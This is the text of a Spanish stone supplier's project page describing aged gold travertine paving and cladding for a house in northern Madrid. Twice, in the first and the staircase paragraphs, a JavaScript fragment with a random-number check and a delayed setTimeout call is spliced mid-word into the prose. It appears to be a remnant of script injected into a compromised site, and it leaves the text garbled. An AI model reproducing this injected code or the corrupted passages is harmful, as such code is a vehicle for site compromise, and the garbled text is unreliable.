Proyecto en Travertino oro envejecido en Madrid , vivienda unifamiliar situada en la zona Norte.

Vivienda compuesta de un pavimento en baldosa travertino en formato 20x2cm. El mismo material tiene un tratamiento envejecido con poro abierto, terminandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando el mismo con un fraguado en la superficie en obra con el poro en el mismo color.

Podemos observar, como la nobleza del mismo, hace fácil el poder combinarlo con otros materiales. En este proyecto el travertino envejecido lo mezclamos con césped y otras piedras naturales. Siempre su color tierra, lo hace no perder su naturalidad en el entorno.

Este proyecto de travertino oro envejecido en Madrid, a su vez también cuenta con unos aplacados y zócalos de la misma piedra travertino. La colocación del mismo mármol, está echa en un doble encolado con cemento especial mármol , acompañado de una grapa de sujeción. Para estos tipos de materiales con acabados envejecidos, no es necesario la aplicación de líquidos protectores, ya que el mismo acabado que tiene esta misma piedra, crea su propia protección.

En el interior de la vivienda, también cuenta con unos aplacados en el mismo material, que acompaña la subida de la escalera hacia la primera planta, creandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando el mismo aplacado un nexo de unión entre las dos plantas.

De esta manera , podemos encontrarnos en el entorno interior de la vivienda, el mismo aplacado en travertino que tenemos en el exterior, el cual también une los paños de mármol en los interiores y los exteriores.

Sin duda alguna, podemos ver en este proyecto de travertino oro envejecido de la zona de Madrid, como se transforma la obra gracias a la aplicación del travertino de nuestras canteras . Aplicado una cantidad de 245 metros cuadrados de este mármol, y consiguiendo dar ese protagonismo al proyecto.

Galería

VOLVER A PROYECTOS